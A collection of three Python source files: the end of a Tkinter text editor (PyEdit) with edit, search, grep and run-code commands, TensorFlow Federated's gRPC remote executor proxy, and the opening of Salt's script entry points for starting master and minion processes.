check self for changes, and if might quit(), main windows should check
other windows in the process-wide list to see if they have changed too;
"""
assert False, 'onQuit must be defined in window-specific sublass'
def text_edit_modified(self):
"""
2.1: this now works! seems to have been a bool result type issue in tkinter;
2.0: self.text.edit_modified() broken in Python 2.4: do manually for now;
"""
return self.text.edit_modified()
#return self.tk.call((self.text._w, 'edit') + ('modified', None))
############################################################################
# Edit menu commands
############################################################################
def onUndo(self): # 2.0
try: # tk8.4 keeps undo/redo stacks
self.text.edit_undo() # exception if stacks empty
except TclError: # menu tear-offs for quick undo
showinfo('PyEdit', 'Nothing to undo')
def onRedo(self): # 2.0: redo an undone
try:
self.text.edit_redo()
except TclError:
showinfo('PyEdit', 'Nothing to redo')
def onCopy(self): # get text selected by mouse, etc.
if not self.text.tag_ranges(SEL): # save in cross-app clipboard
showerror('PyEdit', 'No text selected')
else:
text = self.text.get(SEL_FIRST, SEL_LAST)
self.clipboard_clear()
self.clipboard_append(text)
def onDelete(self): # delete selected text, no save
if not self.text.tag_ranges(SEL):
showerror('PyEdit', 'No text selected')
else:
self.text.delete(SEL_FIRST, SEL_LAST)
def onCut(self):
if not self.text.tag_ranges(SEL):
showerror('PyEdit', 'No text selected')
else:
self.onCopy() # save and delete selected text
self.onDelete()
def onPaste(self):
try:
text = self.selection_get(selection='CLIPBOARD')
except TclError:
showerror('PyEdit', 'Nothing to paste')
return
self.text.insert(INSERT, text) # add at current insert cursor
self.text.tag_remove(SEL, '1.0', END)
self.text.tag_add(SEL, INSERT+'-%dc' % len(text), INSERT)
self.text.see(INSERT) # select it, so it can be cut
def onSelectAll(self):
self.text.tag_add(SEL, '1.0', END+'-1c') # select entire text
self.text.mark_set(INSERT, '1.0') # move insert point to top
self.text.see(INSERT) # scroll to top
############################################################################
# Search menu commands
############################################################################
def onGoto(self, forceline=None):
line = forceline or askinteger('PyEdit', 'Enter line number')
self.text.update()
self.text.focus()
if line is not None:
maxindex = self.text.index(END+'-1c')
maxline = int(maxindex.split('.')[0])
if line > 0 and line <= maxline:
self.text.mark_set(INSERT, '%d.0' % line) # goto line
self.text.tag_remove(SEL, '1.0', END) # delete selects
self.text.tag_add(SEL, INSERT, 'insert + 1l') # select line
self.text.see(INSERT) # scroll to line
else:
showerror('PyEdit', 'Bad line number')
def onFind(self, lastkey=None):
key = lastkey or askstring('PyEdit', 'Enter search string')
self.text.update()
self.text.focus()
self.lastfind = key
if key: # 2.0: nocase
nocase = configs.get('caseinsens', True) # 2.0: config
where = self.text.search(key, INSERT, END, nocase=nocase)
if not where: # don't wrap
showerror('PyEdit', 'String not found')
else:
pastkey = where + '+%dc' % len(key) # index past key
self.text.tag_remove(SEL, '1.0', END) # remove any sel
self.text.tag_add(SEL, where, pastkey) # select key
self.text.mark_set(INSERT, pastkey) # for next find
self.text.see(where) # scroll display
def onRefind(self):
self.onFind(self.lastfind)
def onChange(self):
"""
non-modal find/change dialog
2.1: pass per-dialog inputs to callbacks, may be > 1 change dialog open
"""
new = Toplevel(self)
new.title('PyEdit - change')
Label(new, text='Find text?', relief=RIDGE, width=15).grid(row=0, column=0)
Label(new, text='Change to?', relief=RIDGE, width=15).grid(row=1, column=0)
entry1 = Entry(new)
entry2 = Entry(new)
entry1.grid(row=0, column=1, sticky=EW)
entry2.grid(row=1, column=1, sticky=EW)
def onFind(): # use my entry in enclosing scope
self.onFind(entry1.get()) # runs normal find dialog callback
def onApply():
self.onDoChange(entry1.get(), entry2.get())
Button(new, text='Find', command=onFind ).grid(row=0, column=2, sticky=EW)
Button(new, text='Apply', command=onApply).grid(row=1, column=2, sticky=EW)
new.columnconfigure(1, weight=1) # expandable entries
def onDoChange(self, findtext, changeto):
# on Apply in change dialog: change and refind
if self.text.tag_ranges(SEL): # must find first
self.text.delete(SEL_FIRST, SEL_LAST)
self.text.insert(INSERT, changeto) # deletes if empty
self.text.see(INSERT)
self.onFind(findtext) # goto next appear
self.text.update() # force refresh
def onGrep(self):
"""
new in version 2.1: threaded external file search;
search matched filenames in directory tree for string;
listbox clicks open matched file at line of occurrence;
search is threaded so the GUI remains active and is not
blocked, and to allow multiple greps to overlap in time;
could use threadtools, but avoid loop in no active grep;
"""
from PP4E.Gui.ShellGui.formrows import makeFormRow
# nonmodal dialog: get dirnname, filenamepatt, grepkey
popup = Toplevel()
popup.title('PyEdit - grep')
var1 = makeFormRow(popup, label='Directory root', width=18, browse=False)
var2 = makeFormRow(popup, label='Filename pattern', width=18, browse=False)
var3 = makeFormRow(popup, label='Search string', width=18, browse=False)
var1.set('.') # current dir
var2.set('*.py') # initial values
Button(popup, text='Go',
command=lambda: self.onDoGrep(var1.get(), var2.get(), var3.get())).pack()
def onDoGrep(self, dirname, filenamepatt, grepkey):
# on Go in grep dialog: populate scrolled list with matches
# tbd: should producer thread be daemon so dies with app?
import threading, queue
# make non-modal un-closeable dialog
mypopup = Tk()
mypopup.title('PyEdit - grepping')
status = Label(mypopup, text='Grep thread searching for: %r...' % grepkey)
status.pack(padx=20, pady=20)
mypopup.protocol('WM_DELETE_WINDOW', lambda: None) # ignore X close
# start producer thread, consumer loop
myqueue = queue.Queue()
threadargs = (filenamepatt, dirname, grepkey, myqueue)
threading.Thread(target=self.grepThreadProducer, args=threadargs).start()
self.grepThreadConsumer(grepkey, myqueue, mypopup)
def grepThreadProducer(self, filenamepatt, dirname, grepkey, myqueue):
"""
in a non-GUI parallel thread: queue find.find results list;
could also queue matches as found, but need to keep window;
"""
from PP4E.Tools.find import find
matches = []
for filepath in find(pattern=filenamepatt, startdir=dirname):
try:
for (linenum, linestr) in enumerate(open(filepath)):
if grepkey in linestr:
message = '%s@%d [%s]' % (filepath, linenum + 1, linestr)
matches.append(message)
except UnicodeDecodeError:
print('Unicode error in:', filepath)
myqueue.put(matches)
def grepThreadConsumer(self, grepkey, myqueue, mypopup):
"""
in the main GUI thread: watch queue for results or [];
there may be multiple active grep threads/loops/queues;
there may be other types of threads/checkers in process,
especially when PyEdit is attached component (PyMailGUI);
"""
import queue
try:
matches = myqueue.get(block=False)
except queue.Empty:
self.after(250, self.grepThreadConsumer, grepkey, myqueue, mypopup)
else:
mypopup.destroy() # close status
self.update() # erase it now
if not matches:
showinfo('PyEdit', 'Grep found no matches for: %r' % grepkey)
else:
self.grepMatchesList(matches, grepkey)
def grepMatchesList(self, matches, grepkey):
# populate list after successful matches
from PP4E.Gui.Tour.scrolledlist import ScrolledList
print('Matches for %s: %s' % (grepkey, len(matches)))
# catch list double-click
class ScrolledFilenames(ScrolledList):
def runCommand(self, selection):
file, line = selection.split(' [', 1)[0].split('@')
editor = TextEditorMainPopup(loadFirst=file, winTitle=' grep match')
editor.onGoto(int(line))
editor.text.focus_force() # no, really
# new non-modal widnow
popup = Tk()
popup.title('PyEdit - grep matches: %r' % grepkey)
ScrolledFilenames(parent=popup, options=matches)
############################################################################
# Tools menu commands
############################################################################
def onFontList(self):
self.fonts.append(self.fonts[0]) # pick next font in list
del self.fonts[0] # resizes the text area
self.text.config(font=self.fonts[0])
def onColorList(self):
self.colors.append(self.colors[0]) # pick next color in list
del self.colors[0] # move current to end
self.text.config(fg=self.colors[0]['fg'], bg=self.colors[0]['bg'])
def onPickFg(self):
self.pickColor('fg') # added on 10/02/00
def onPickBg(self): # select arbitrary color
self.pickColor('bg') # in standard color dialog
def pickColor(self, part): # this is too easy
(triple, hexstr) = askcolor()
if hexstr:
self.text.config(**{part: hexstr})
def onInfo(self):
text = self.getAllText() # added on 5/3/00 in 15 mins
bytes = len(text) # words uses a simple guess:
lines = len(text.split('\n')) # any separated by whitespace
words = len(text.split()) # 3.x: bytes is really chars
index = self.text.index(INSERT) # str is unicode code points
where = tuple(index.split('.'))
showinfo('PyEdit Information',
'Current location:\n\n' +
'line:\t%s\ncolumn:\t%s\n\n' % where +
'File text statistics:\n\n' +
'chars:\t%d\nlines:\t%d\nwords:\t%d\n' % (bytes, lines, words))
def onClone(self):
"""
open a new edit window without changing one already open
inherits quit and other behavior of window that it clones
"""
new = Toplevel() # a new edit window in same process
myclass = self.__class__ # instance's (lowest) class object
myclass(new) # attach/run instance of my class
def onRunCode(self, parallelmode=True):
"""
run Python code being edited--not an IDE, but handy;
tries to run in file's dir, not cwd (may be PP4E root);
inputs and adds command-line arguments for script files;
code's stdin/out/err = editor's start window, if any:
run with a console window to see code's print outputs;
but parallelmode uses start to open a DOS box for I/O;
module search path will include '.' dir where started;
in non-file mode, code's Tk root may be PyEdit's window;
subprocess or multiprocessing modules may work here too;
2.1: fixed to use base file name after chdir, not path;
2.1: use StartArs to allow args in file mode on Windows;
"""
def askcmdargs():
return askstring('PyEdit', 'Commandline arguments?') or ''
from PP4E.launchmodes import System, Start, StartArgs, Fork
filemode = False
thefile = str(self.getFileName())
if os.path.exists(thefile):
filemode = askyesno('PyEdit', 'Run from file?')
if not filemode: # run text string
cmdargs = askcmdargs()
namespace = {'__name__': '__main__'} # run as top-level
sys.argv = [thefile] + cmdargs.split() # could use threads
exec(self.getAllText() + '\n', namespace) # exceptions ignored
elif self.text_edit_modified(): # 2.0: changed test
showerror('PyEdit', 'Text changed: save before run')
else:
cmdargs = askcmdargs()
mycwd = os.getcwd() # cwd may be root
dirname, filename = os.path.split(thefile) # get dir, base
os.chdir(dirname or mycwd) # cd for filenames
thecmd = filename + ' ' + cmdargs # 2.1: not theFile
if not parallelmode: # run as file
System(thecmd, thecmd)() # block editor
else:
if sys.platform[:3] == 'win': # spawn in parallel
run = StartArgs if cmdargs else Start # 2.1: support args
run(thecmd, thecmd)() # or always Spawn
else:
Fork(thecmd, thecmd)() # spawn in parallel
os.chdir(mycwd) # go back to my dir
def onPickFont(self):
"""
2.0 non-modal font spec dialog
2.1: pass per-dialog inputs to callback, may be > 1 font dialog open
"""
from PP4E.Gui.ShellGui.formrows import makeFormRow
popup = Toplevel(self)
popup.title('PyEdit - font')
var1 = makeFormRow(popup, label='Family', browse=False)
var2 = makeFormRow(popup, label='Size', browse=False)
var3 = makeFormRow(popup, label='Style', browse=False)
var1.set('courier')
var2.set('12') # suggested vals
var3.set('bold italic') # see pick list for valid inputs
Button(popup, text='Apply', command=
lambda: self.onDoFont(var1.get(), var2.get(), var3.get())).pack()
def onDoFont(self, family, size, style):
try:
self.text.config(font=(family, int(size), style))
except:
showerror('PyEdit', 'Bad font specification')
############################################################################
# Utilities, useful outside this class
############################################################################
def isEmpty(self):
return not self.getAllText()
def getAllText(self):
return self.text.get('1.0', END+'-1c') # extract text as a string
def setAllText(self, text):
self.text.delete('1.0', END) # store text string in widget
self.text.insert(END, text) # or '1.0'
self.text.mark_set(INSERT, '1.0') # move insert point to top
self.text.see(INSERT) # scroll to top, insert set
def clearAllText(self):
self.text.delete('1.0', END) # clear text in widget
def getFileName(self):
return self.currfile
def setFileName(self, name): # also: onGoto(linenum)
self.currfile = name # for save
self.filelabel.config(text=str(name))
def setBg(self, color):
self.text.config(bg=color) # to set manually from code
def setFg(self, color):
self.text.config(fg=color) # 'black', hexstring
def setFont(self, font):
self.text.config(font=font) # ('family', size, 'style')
def setHeight(self, lines): # default = 24h x 80w
self.text.config(height=lines) # may also be from textCongif.py
def setWidth(self, chars):
self.text.config(width=chars)
def clearModified(self):
self.text.edit_modified(0) # clear modified flag
def isModified(self):
return self.text_edit_modified() # changed since last reset?
def help(self):
showinfo('About PyEdit', helptext % ((Version,)*2))
################################################################################
# Ready-to-use editor classes
# mix in a GuiMaker Frame subclass which builds menu and toolbars
#
# these classes are common use cases, but other configurations are possible;
# call TextEditorMain().mainloop() to start PyEdit as a standalone program;
# redefine/extend onQuit in a subclass to catch exit or destroy (see PyView);
# caveat: could use windows.py for icons, but quit protocol is custom here.
################################################################################
# 2.1: on quit(), don't silently exit entire app if any other changed edit
# windows are open in the process - changes would be lost because all other
# windows are closed too, including multiple Tk editor parents; uses a list
# to keep track of all PyEdit window instances open in process; this may be
# too broad (if we destroy() instead of quit(), need only check check children
# of parent being destroyed), but better to err on side of being too inclusive;
# onQuit moved here because varies per window type and is not present for all;
#
# assumes a TextEditorMainPopup is never a parent to other editor windows -
# Toplevel children are destroyed with their parents; this does not address
# closes outside the scope of PyEdit classes here (tkinter quit is available
# on every widget, and any widget type may be a Toplevel parent!); client is
# responsible for checking for editor content changes in all uncovered cases;
# note that tkinter's <Destroy> bind event won't help here, because its callback
# cannot run GUI operations such as text change tests and fetches - see the
# book and destroyer.py for more details on this event;
#
# when editor owns the window
#
class TextEditorMain(TextEditor, GuiMakerWindowMenu):
"""
main PyEdit windows that quit() to exit app on a Quit in GUI, and build
a menu on a window; parent may be default Tk, explicit Tk, or Toplevel:
parent must be a window, and probably should be a Tk so this isn't silently
destoyed and closed with a parent; all main PyEdit windows check all other
PyEdit windows open in the process for changes on a Quit in the GUI, since
a quit() here will exit the entire app; the editor's frame need not occupy
entire window (may have other parts: see PyView), but its Quit ends program;
onQuit is run for Quit in toolbar or File menu, as well as window border X;
"""
def __init__(self, parent=None, loadFirst=''): # when fills whole window
GuiMaker.__init__(self, parent) # use main window menus
TextEditor.__init__(self, loadFirst) # GuiMaker frame packs self
self.master.title('PyEdit ' + Version) # title, wm X if standalone
self.master.iconname('PyEdit')
self.master.protocol('WM_DELETE_WINDOW', self.onQuit)
TextEditor.editwindows.append(self)
def onQuit(self): # on a Quit request in the GUI
close = not self.text_edit_modified() # check self, ask?, check others
if not close:
close = askyesno('PyEdit', 'Text changed: quit and discard changes?')
if close:
windows = TextEditor.editwindows
changed = [w for w in windows if w != self and w.text_edit_modified()]
if not changed:
GuiMaker.quit(self) # quit ends entire app regardless of widget type
else:
numchange = len(changed)
verify = '%s other edit window%s changed: quit and discard anyhow?'
verify = verify % (numchange, 's' if numchange > 1 else '')
if askyesno('PyEdit', verify):
GuiMaker.quit(self)
class TextEditorMainPopup(TextEditor, GuiMakerWindowMenu):
"""
popup PyEdit windows that destroy() to close only self on a Quit in GUI,
and build a menu on a window; makes own Toplevel parent, which is child
to default Tk (for None) or other passed-in window or widget (e.g., a frame);
adds to list so will be checked for changes if any PyEdit main window quits;
if any PyEdit main windows will be created, parent of this should also be a
PyEdit main window's parent so this is not closed silently while being tracked;
onQuit is run for Quit in toolbar or File menu, as well as window border X;
"""
def __init__(self, parent=None, loadFirst='', winTitle=''):
self.popup = Toplevel(parent) # create own window
GuiMaker.__init__(self, self.popup) # use main window menus
TextEditor.__init__(self, loadFirst) # a frame in a new popup
assert self.master == self.popup
self.popup.title('PyEdit ' + Version + winTitle)
self.popup.iconname('PyEdit')
self.popup.protocol('WM_DELETE_WINDOW', self.onQuit)
TextEditor.editwindows.append(self)
def onQuit(self):
close = not self.text_edit_modified()
if not close:
close = askyesno('PyEdit', 'Text changed: quit and discard changes?')
if close:
self.popup.destroy() # kill this window only
TextEditor.editwindows.remove(self) # (plus any child windows)
#
# when editor embedded in another window
#
class TextEditorComponent(TextEditor, GuiMakerFrameMenu):
"""
attached PyEdit component frames with full menu/toolbar options,
which run a destroy() on a Quit in the GUI to erase self only;
a Quit in the GUI verifies if any changes in self (only) here;
does not intercept window manager border X: doesn't own window;
does not add self to changes tracking list: part of larger app;
"""
def __init__(self, parent=None, loadFirst=''): # use Frame-based menus
GuiMaker.__init__(self, parent) # all menus, buttons on
TextEditor.__init__(self, loadFirst) # GuiMaker must init 1st
def onQuit(self):
close = not self.text_edit_modified()
if not close:
close = askyesno('PyEdit', 'Text changed: quit and discard changes?')
if close:
self.destroy() # erase self Frame but do not quit enclosing app
class TextEditorComponentMinimal(TextEditor, GuiMakerFrameMenu):
"""
attached PyEdit component frames without Quit and File menu options;
on startup, removes Quit from toolbar, and either deletes File menu
or disables all its items (possibly hackish, but sufficient); menu and
toolbar structures are per-instance data: changes do not impact others;
Quit in GUI never occurs, because it is removed from available options;
"""
def __init__(self, parent=None, loadFirst='', deleteFile=True):
self.deleteFile = deleteFile
GuiMaker.__init__(self, parent) # GuiMaker frame packs self
TextEditor.__init__(self, loadFirst) # TextEditor adds middle
def start(self):
TextEditor.start(self) # GuiMaker start call
for i in range(len(self.toolBar)): # delete quit in toolbar
if self.toolBar[i][0] == 'Quit': # delete file menu items,
del self.toolBar[i] # or just disable file
break
if self.deleteFile:
for i in range(len(self.menuBar)):
if self.menuBar[i][0] == 'File':
del self.menuBar[i]
break
else:
for (name, key, items) in self.menuBar:
if name == 'File':
items.append([1,2,3,4,6])
################################################################################
# standalone program run
################################################################################
def testPopup():
# see PyView and PyMail for component tests
root = Tk()
TextEditorMainPopup(root)
TextEditorMainPopup(root)
Button(root, text='More', command=TextEditorMainPopup).pack(fill=X)
Button(root, text='Quit', command=root.quit).pack(fill=X)
root.mainloop()
def main(): # may be typed or clicked
try: # or associated on Windows
fname = sys.argv[1] # arg = optional filename
except IndexError: # build in default Tk root
fname = None
TextEditorMain(loadFirst=fname).pack(expand=YES, fill=BOTH)
mainloop()
if __name__ == '__main__': # when run as a script
#testPopup()
main() # run .pyw for no DOS box
|
remote_executor.py
|
# Copyright 2019, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A local proxy for a remote executor service hosted on a separate machine."""
import asyncio
import itertools
import queue
import threading
from typing import Mapping
import weakref
import absl.logging as logging
import grpc
from tensorflow_federated.proto.v0 import executor_pb2
from tensorflow_federated.proto.v0 import executor_pb2_grpc
from tensorflow_federated.python.common_libs import py_typecheck
from tensorflow_federated.python.common_libs import structure
from tensorflow_federated.python.common_libs import tracing
from tensorflow_federated.python.core.api import computation_types
from tensorflow_federated.python.core.impl.executors import execution_context
from tensorflow_federated.python.core.impl.executors import executor_base
from tensorflow_federated.python.core.impl.executors import executor_service_utils
from tensorflow_federated.python.core.impl.executors import executor_value_base
from tensorflow_federated.python.core.impl.types import placement_literals
_STREAM_CLOSE_WAIT_SECONDS = 10
class RemoteValue(executor_value_base.ExecutorValue):
"""A reference to a value embedded in a remotely deployed executor service."""
def __init__(self, value_ref: executor_pb2.ValueRef, type_spec, executor):
"""Creates the value.
Args:
value_ref: An instance of `executor_pb2.ValueRef` returned by the remote
executor service.
type_spec: An instance of `computation_types.Type`.
executor: The executor that created this value.
"""
py_typecheck.check_type(value_ref, executor_pb2.ValueRef)
py_typecheck.check_type(type_spec, computation_types.Type)
py_typecheck.check_type(executor, RemoteExecutor)
self._value_ref = value_ref
self._type_signature = type_spec
self._executor = executor
# Clean up the value and the memory associated with it on the remote
# worker when no references to it remain.
def finalizer(value_ref, executor):
executor._dispose(value_ref) # pylint: disable=protected-access
weakref.finalize(self, finalizer, value_ref, executor)
@property
def type_signature(self):
return self._type_signature
@tracing.trace(span=True)
async def compute(self):
return await self._executor._compute(self._value_ref) # pylint: disable=protected-access
@property
def value_ref(self):
return self._value_ref
class _BidiStream:
"""A bidi stream connection to the Executor service's Execute method."""
def __init__(self, stub, thread_pool_executor):
self._stub = stub
self._thread_pool_executor = thread_pool_executor
self._is_initialized = False
def _lazy_init(self):
"""Lazily initialize the underlying gRPC stream."""
if self._is_initialized:
return
logging.debug('Initializing bidi stream')
self._request_queue = queue.Queue()
self._response_event_dict = {}
self._stream_closed_event = threading.Event()
def request_iter():
"""Iterator that blocks on the request Queue."""
for seq in itertools.count():
logging.debug('Request thread: blocking for next request')
val = self._request_queue.get()
if val:
py_typecheck.check_type(val[0], executor_pb2.ExecuteRequest)
py_typecheck.check_type(val[1], threading.Event)
req = val[0]
req.sequence_number = seq
logging.debug(
'Request thread: processing request of type %s, seq_no %s',
val[0].WhichOneof('request'), seq)
self._response_event_dict[seq] = val[1]
yield val[0]
else:
logging.debug(
'Request thread: Final request received. Stream will close.')
# None means we are done processing
return
response_iter = self._stub.Execute(request_iter())
def response_thread_fn():
"""Consumes response iter and exposes the value on corresponding Event."""
try:
logging.debug('Response thread: blocking for next response')
for response in response_iter:
logging.debug(
'Response thread: processing response of type %s, seq_no %s',
response.WhichOneof('response'), response.sequence_number)
# Get the corresponding response Event
response_event = self._response_event_dict[response.sequence_number]
# Attach the response as an attribute on the Event
response_event.response = response
response_event.set()
# Set the event indicating the stream has been closed
self._stream_closed_event.set()
except Exception as error: # pylint: disable=broad-except
logging.exception('Error calling remote executor: %s', error)
if _is_retryable_grpc_error(error):
logging.exception('gRPC error is retryable')
error = execution_context.RetryableError(error)
# Set all response events to errors. This is heavy-handed and
# potentially can be scaled back.
for _, response_event in self._response_event_dict.items():
if not response_event.isSet():
response_event.response = error
response_event.set()
self._stream_closed_event.set()
response_thread = threading.Thread(target=response_thread_fn)
response_thread.daemon = True
response_thread.start()
self._is_initialized = True
@tracing.trace(span=True)
async def send_request(self, request):
"""Send a request on the bidi stream."""
self._lazy_init()
py_typecheck.check_type(request, executor_pb2.ExecuteRequest)
request_type = request.WhichOneof('request')
response_event = threading.Event()
# Enqueue a tuple of request and an Event used to return the response
self._request_queue.put((request, response_event))
await asyncio.get_event_loop().run_in_executor(self._thread_pool_executor,
response_event.wait)
response = response_event.response # pytype: disable=attribute-error
if isinstance(response, Exception):
raise response
py_typecheck.check_type(response, executor_pb2.ExecuteResponse)
response_type = response.WhichOneof('response')
if response_type != request_type:
raise ValueError('Request had type: {} but response had type: {}'.format(
request_type, response_type))
return response
def close(self):
if self._is_initialized:
logging.debug('Closing bidi stream')
self._request_queue.put(None)
# Wait for the stream to be closed
self._stream_closed_event.wait(_STREAM_CLOSE_WAIT_SECONDS)
else:
logging.debug('Closing unused bidi stream')
self._is_initialized = False
@tracing.trace(span=True)
def _request(rpc_func, request):
"""Populates trace context and reraises gRPC errors with retryable info."""
with tracing.wrap_rpc_in_trace_context():
try:
return rpc_func(request)
except grpc.RpcError as e:
if _is_retryable_grpc_error(e):
logging.info('Received retryable gRPC error: %s', e)
raise execution_context.RetryableError(e)
else:
raise
def _is_retryable_grpc_error(error):
"""Predicate defining what is a retryable gRPC error."""
non_retryable_errors = {
grpc.StatusCode.INVALID_ARGUMENT,
grpc.StatusCode.NOT_FOUND,
grpc.StatusCode.ALREADY_EXISTS,
grpc.StatusCode.PERMISSION_DENIED,
grpc.StatusCode.FAILED_PRECONDITION,
grpc.StatusCode.ABORTED,
grpc.StatusCode.OUT_OF_RANGE,
grpc.StatusCode.UNIMPLEMENTED,
grpc.StatusCode.DATA_LOSS,
grpc.StatusCode.UNAUTHENTICATED,
}
return (isinstance(error, grpc.RpcError) and
error.code() not in non_retryable_errors) # pytype: disable=attribute-error
class RemoteExecutor(executor_base.Executor):
"""The remote executor is a local proxy for a remote executor instance."""
# TODO(b/134543154): Switch to using an asynchronous gRPC client so we don't
# have to block on all those calls.
def __init__(self,
channel,
rpc_mode='REQUEST_REPLY',
thread_pool_executor=None,
dispose_batch_size=20):
"""Creates a remote executor.
Args:
channel: An instance of `grpc.Channel` to use for communication with the
remote executor service.
rpc_mode: Optional mode of calling the remote executor. Must be either
'REQUEST_REPLY' or 'STREAMING' (defaults to 'REQUEST_REPLY'). This
option will be removed after the request-reply interface is deprecated.
thread_pool_executor: Optional concurrent.futures.Executor used to wait
for the reply to a streaming RPC message. Uses the default Executor if
not specified.
dispose_batch_size: The batch size for requests to dispose of remote
worker values. Lower values will result in more requests to the remote
worker, but will result in values being cleaned up sooner and therefore
may result in lower memory usage on the remote worker.
"""
py_typecheck.check_type(channel, grpc.Channel)
py_typecheck.check_type(rpc_mode, str)
py_typecheck.check_type(dispose_batch_size, int)
if rpc_mode not in ['REQUEST_REPLY', 'STREAMING']:
raise ValueError('Invalid rpc_mode: {}'.format(rpc_mode))
logging.debug('Creating new ExecutorStub with RPC_MODE=%s', rpc_mode)
self._stub = executor_pb2_grpc.ExecutorStub(channel)
self._bidi_stream = None
self._dispose_batch_size = dispose_batch_size
self._dispose_request = executor_pb2.DisposeRequest()
if rpc_mode == 'STREAMING':
logging.debug('Creating Bidi stream')
self._bidi_stream = _BidiStream(self._stub, thread_pool_executor)
def close(self):
if self._bidi_stream is not None:
logging.debug('Closing bidi stream')
self._bidi_stream.close()
def _dispose(self, value_ref: executor_pb2.ValueRef):
"""Disposes of the remote value stored on the worker service."""
self._dispose_request.value_ref.append(value_ref)
if len(self._dispose_request.value_ref) < self._dispose_batch_size:
return
dispose_request = self._dispose_request
self._dispose_request = executor_pb2.DisposeRequest()
if self._bidi_stream is None:
_request(self._stub.Dispose, dispose_request)
else:
send_request_fut = self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(dispose=dispose_request))
# We don't care about the response, and so don't bother to await it.
# Just start it as a task so that it runs at some point.
asyncio.get_event_loop().create_task(send_request_fut)
@tracing.trace(span=True)
async def set_cardinalities(
self, cardinalities: Mapping[placement_literals.PlacementLiteral, int]):
serialized_cardinalities = executor_service_utils.serialize_cardinalities(
cardinalities)
request = executor_pb2.SetCardinalitiesRequest(
cardinalities=serialized_cardinalities)
if self._bidi_stream is None:
_request(self._stub.SetCardinalities, request)
else:
await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(set_cardinalities=request))
return
@tracing.trace(span=True)
async def create_value(self, value, type_spec=None):
@tracing.trace
def serialize_value():
return executor_service_utils.serialize_value(value, type_spec)
value_proto, type_spec = serialize_value()
create_value_request = executor_pb2.CreateValueRequest(value=value_proto)
if self._bidi_stream is None:
response = _request(self._stub.CreateValue, create_value_request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_value=create_value_request)
)).create_value
py_typecheck.check_type(response, executor_pb2.CreateValueResponse)
return RemoteValue(response.value_ref, type_spec, self)
@tracing.trace(span=True)
async def create_call(self, comp, arg=None):
py_typecheck.check_type(comp, RemoteValue)
py_typecheck.check_type(comp.type_signature, computation_types.FunctionType)
if arg is not None:
py_typecheck.check_type(arg, RemoteValue)
create_call_request = executor_pb2.CreateCallRequest(
function_ref=comp.value_ref,
argument_ref=(arg.value_ref if arg is not None else None))
if self._bidi_stream is None:
response = _request(self._stub.CreateCall, create_call_request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_call=create_call_request)
)).create_call
py_typecheck.check_type(response, executor_pb2.CreateCallResponse)
return RemoteValue(response.value_ref, comp.type_signature.result, self)
@tracing.trace(span=True)
async def create_struct(self, elements):
constructed_anon_tuple = structure.from_container(elements)
proto_elem = []
type_elem = []
for k, v in structure.iter_elements(constructed_anon_tuple):
py_typecheck.check_type(v, RemoteValue)
proto_elem.append(
executor_pb2.CreateStructRequest.Element(
name=(k if k else None), value_ref=v.value_ref))
type_elem.append((k, v.type_signature) if k else v.type_signature)
result_type = computation_types.StructType(type_elem)
request = executor_pb2.CreateStructRequest(element=proto_elem)
if self._bidi_stream is None:
response = _request(self._stub.CreateStruct, request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_struct=request))).create_struct
py_typecheck.check_type(response, executor_pb2.CreateStructResponse)
return RemoteValue(response.value_ref, result_type, self)
@tracing.trace(span=True)
async def create_selection(self, source, index=None, name=None):
py_typecheck.check_type(source, RemoteValue)
py_typecheck.check_type(source.type_signature, computation_types.StructType)
if index is not None:
py_typecheck.check_type(index, int)
py_typecheck.check_none(name)
result_type = source.type_signature[index]
else:
py_typecheck.check_type(name, str)
result_type = getattr(source.type_signature, name)
request = executor_pb2.CreateSelectionRequest(
source_ref=source.value_ref, name=name, index=index)
if self._bidi_stream is None:
response = _request(self._stub.CreateSelection, request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_selection=request)
)).create_selection
py_typecheck.check_type(response, executor_pb2.CreateSelectionResponse)
return RemoteValue(response.value_ref, result_type, self)
@tracing.trace(span=True)
async def _compute(self, value_ref):
py_typecheck.check_type(value_ref, executor_pb2.ValueRef)
request = executor_pb2.ComputeRequest(value_ref=value_ref)
if self._bidi_stream is None:
response = _request(self._stub.Compute, request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(compute=request))).compute
py_typecheck.check_type(response, executor_pb2.ComputeResponse)
value, _ = executor_service_utils.deserialize_value(response.value)
return value
|
scripts.py
|
# -*- coding: utf-8 -*-
'''
This module contains the function calls to execute command line scripts
'''
# Import python libs
from __future__ import absolute_import, print_function
import os
import sys
import time
import logging
import threading
import traceback
from random import randint
# Import salt libs
from salt import cloud, defaults
from salt.exceptions import SaltSystemExit, SaltClientError, SaltReqTimeoutError
import salt.defaults.exitcodes # pylint: disable=unused-import
log = logging.getLogger(__name__)
def _handle_interrupt(exc, original_exc, hardfail=False, trace=''):
'''
if hardfailing:
If we got the original stacktrace, log it
If all cases, raise the original exception
but this is logically part the initial
stack.
else just let salt exit gracefully
'''
if hardfail:
if trace:
log.error(trace)
raise original_exc
else:
raise exc
def salt_master():
'''
Start the salt master.
'''
import salt.cli.daemons
master = salt.cli.daemons.Master()
master.start()
def minion_process():
'''
Start a minion process
'''
import salt.utils
import salt.cli.daemons
# salt_minion spawns this function in a new process
salt.utils.appendproctitle('KeepAlive')
def suicide_when_without_parent(parent_pid):
'''
Have the minion suicide if the parent process is gone
NOTE: small race issue where the parent PID could be replace
with another process with same PID!
'''
while True:
time.sleep(5)
try:
# check pid alive (Unix only trick!)
if os.getuid() == 0 and not salt.utils.is_windows():
os.kill(parent_pid, 0)
except OSError as exc:
# forcibly exit, regular sys.exit raises an exception-- which
# isn't sufficient in a thread
log.error('Minion process encountered exception: {0}'.format(exc))
os._exit(salt.defaults.exitcodes.EX_GENERIC)
if not salt.utils.is_windows():
thread = threading.Thread(target=suicide_when_without_parent, args=(os.getppid(),))
thread.start()
